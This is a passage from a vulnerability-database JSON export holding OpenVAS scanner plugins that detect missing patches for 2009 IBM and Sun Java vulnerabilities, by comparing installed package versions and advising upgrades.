9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1647.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running instances\nof IBM Java must be restarted for this update to take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:66471", "href": "http://plugins.openvas.org/nasl.php?oid=66471", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1647", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1647.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1647 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1647.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running instances\nof IBM Java must be restarted for this update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(66471);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1647\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1647.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm\", rpm:\"java-1.5.0-ibm~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-demo\", rpm:\"java-1.5.0-ibm-demo~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-devel\", rpm:\"java-1.5.0-ibm-devel~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-javacomm\", rpm:\"java-1.5.0-ibm-javacomm~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-jdbc\", rpm:\"java-1.5.0-ibm-jdbc~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-plugin\", rpm:\"java-1.5.0-ibm-plugin~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-src\", rpm:\"java-1.5.0-ibm-src~1.5.0.11~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm\", rpm:\"java-1.5.0-ibm~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-accessibility\", rpm:\"java-1.5.0-ibm-accessibility~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-demo\", rpm:\"java-1.5.0-ibm-demo~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-devel\", rpm:\"java-1.5.0-ibm-devel~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-javacomm\", rpm:\"java-1.5.0-ibm-javacomm~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-jdbc\", rpm:\"java-1.5.0-ibm-jdbc~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-plugin\", rpm:\"java-1.5.0-ibm-plugin~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.5.0-ibm-src\", rpm:\"java-1.5.0-ibm-src~1.5.0.11~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-13T12:59:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "This host is installed with Sun Java JDK/JRE and is prone to\n multiple vulnerabilities.", "modified": "2017-11-08T00:00:00", "published": "2009-11-13T00:00:00", "id": "OPENVAS:800975", "href": "http://plugins.openvas.org/nasl.php?oid=800975", "type": "openvas", "title": "Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_sun_java_jre_mult_vuln_nov09_lin.nasl 7699 2017-11-08 12:10:34Z santu $\n#\n# Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (LinUx)\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation allows remote attacker to execute arbitrary code,\n gain escalated privileges, bypass security restrictions and cause denial\n of service attacks inside the context of the affected system.\n Impact Level: System/Application.\";\ntag_affected = \"Sun Java JDK/JRE 6 prior to 6 Update 17\n Sun Java JDK/JRE 5 prior to 5 Update 22\n Sun Java JDK/JRE 1.4.x prior to 1.4.2_24\n Sun Java JDK/JRE 1.3.x prior to 1.3.1_27 on Linux.\";\ntag_insight = \"Multiple flaws occur due to,\n - Error when decoding 'DER' encoded data and parsing HTTP headers.\n - Error when verifying 'HMAC' digests.\n - Integer overflow error in the 'JPEG JFIF' Decoder while processing\n malicious image files.\n - A buffer overflow error in the 'setDiffICM()' and 'setBytePixels()'\n functions in the Abstract Window Toolkit (AWT).\n - Unspecified error due to improper parsing of color profiles of images.\n - A buffer overflow error due to improper implementation of the\n 'HsbParser.getSoundBank()' function.\n - Three unspecified errors when processing audio or image files.\";\ntag_solution = \"Upgrade to JDK/JRE version 6 Update 17 or later,\n http://java.sun.com/javase/downloads/index.jsp\n OR\n Upgrade to JDK/JRE version 5 Update 22\n http://java.sun.com/javase/downloads/index_jdk5.jsp\n OR\n Upgrade to JDK/JRE version 1.4.2_24\n http://java.sun.com/j2se/1.4.2/download.html\n OR\n Upgrade to JDK/JRE version 1.3.1_27\n http://java.sun.com/j2se/1.3/download.html\";\ntag_summary = \"This host is installed with Sun Java JDK/JRE and is prone to\n multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(800975);\n script_version(\"$Revision: 7699 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-08 13:10:34 +0100 (Wed, 08 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-13 15:48:12 +0100 (Fri, 13 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-3877\", \"CVE-2009-3876\", \"CVE-2009-3875\", \"CVE-2009-3873\",\n \"CVE-2009-3874\", \"CVE-2009-3872\", \"CVE-2009-3871\", \"CVE-2009-3869\",\n \"CVE-2009-3868\", \"CVE-2009-3867\");\n script_bugtraq_id(36881);\n script_name(\"Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Linux)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/37231\");\n script_xref(name : \"URL\" , value : \"http://java.sun.com/javase/6/webnotes/6u17.html\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/3131\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_lin.nasl\");\n script_require_keys(\"Sun/Java/JRE/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\njreVer = get_kb_item(\"Sun/Java/JRE/Linux/Ver\");\nif(!jreVer){\n exit(0);\n}\n\nif(jreVer)\n{\n # Check for 1.3 < 1.3.1_27, 1.4 < 1.4.2_24, 1.5 < 1.5.0_22 (5 Update 22),\n # and 1.6 < 1.6.0_17 (6 Update 17)\n if(version_in_range(version:jreVer, test_version:\"1.3\", test_version2:\"1.3.1.26\")||\n version_in_range(version:jreVer, test_version:\"1.4\", test_version2:\"1.4.2.23\")||\n version_in_range(version:jreVer, test_version:\"1.5\", test_version2:\"1.5.0.21\")||\n version_in_range(version:jreVer, test_version:\"1.6\", test_version2:\"1.6.0.16\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1643.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All running\ninstances of IBM Java must be restarted for this update to take effect.", "modified": "2018-04-06T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:136141256231066469", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066469", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1643", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1643.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1643 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1643.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All running\ninstances of IBM Java must be restarted for this update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66469\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1643\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1643.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-javacomm\", rpm:\"java-1.4.2-ibm-javacomm~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-javacomm\", rpm:\"java-1.4.2-ibm-javacomm~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "This host is installed with Sun Java JDK/JRE and is prone to\n Multiple Vulnerabilities.", "modified": "2018-12-04T00:00:00", "published": "2009-11-13T00:00:00", "id": "OPENVAS:1361412562310800972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800972", "type": "openvas", "title": "Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_sun_java_jre_mult_vuln_nov09_win.nasl 12635 2018-12-04 08:00:20Z cfischer $\n#\n# Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800972\");\n script_version(\"$Revision: 12635 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 09:00:20 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-13 15:48:12 +0100 (Fri, 13 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-3877\", \"CVE-2009-3876\", \"CVE-2009-3875\", \"CVE-2009-3873\",\n \"CVE-2009-3874\", \"CVE-2009-3872\", \"CVE-2009-3871\", \"CVE-2009-3869\",\n \"CVE-2009-3868\", \"CVE-2009-3867\");\n script_bugtraq_id(36881);\n script_name(\"Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37231\");\n script_xref(name:\"URL\", value:\"http://java.sun.com/javase/6/webnotes/6u17.html\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/3131\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_portable_win.nasl\");\n script_mandatory_keys(\"Sun/Java/JDK_or_JRE/Win/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote attacker to execute arbitrary code,\n gain escalated privileges, bypass security restrictions and cause denial\n of service attacks inside the context of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Sun Java JDK/JRE 6 prior to 6 Update 17\n\n Sun Java JDK/JRE 5 prior to 5 Update 22\n\n Sun Java JDK/JRE 1.4.x prior to 1.4.2_24\n\n Sun Java JDK/JRE 1.3.x prior to 1.3.1_27 on Windows.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws occur due to,\n\n - Error when decoding 'DER' encoded data and parsing HTTP headers.\n\n - Error when verifying 'HMAC' digests.\n\n - Integer overflow error in the 'JPEG JFIF' Decoder while processing\n malicious image files.\n\n - A buffer overflow error in the 'setDiffICM()' and 'setBytePixels()'\n functions in the Abstract Window Toolkit (AWT).\n\n - Unspecified error due to improper parsing of color profiles of images.\n\n - A buffer overflow error due to improper implementation of the\n 'HsbParser.getSoundBank()' function.\n\n - Three unspecified errors when processing audio or image files.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to JDK/JRE version 6 Update 17 or later.\n\n Upgrade to JDK/JRE version 5 Update 22\n\n Upgrade to JDK/JRE version 1.4.2_24\n\n Upgrade to JDK/JRE version 1.3.1_27.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Sun Java JDK/JRE and is prone to\n Multiple Vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nver = get_kb_item(\"Sun/Java/JRE/Win/Ver\");\nif(!ver)\n ver = get_kb_item(\"Sun/Java/JDK/Win/Ver\");\n\nif(!ver || ver !~ \"^1\\.[3-6]\\.\")\n exit(0);\n\nif(version_in_range(version:ver, test_version:\"1.3\", test_version2:\"1.3.1.26\")||\n version_in_range(version:ver, test_version:\"1.4\", test_version2:\"1.4.2.23\")||\n version_in_range(version:ver, test_version:\"1.5\", test_version2:\"1.5.0.21\")||\n version_in_range(version:ver, test_version:\"1.6\", test_version2:\"1.6.0.16\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-11-13T12:59:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "This host is installed with Sun Java JDK/JRE and is prone to\n Multiple Vulnerabilities.", "modified": "2017-11-08T00:00:00", "published": "2009-11-13T00:00:00", "id": "OPENVAS:800972", "href": "http://plugins.openvas.org/nasl.php?oid=800972", "type": "openvas", "title": "Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_sun_java_jre_mult_vuln_nov09_win.nasl 7699 2017-11-08 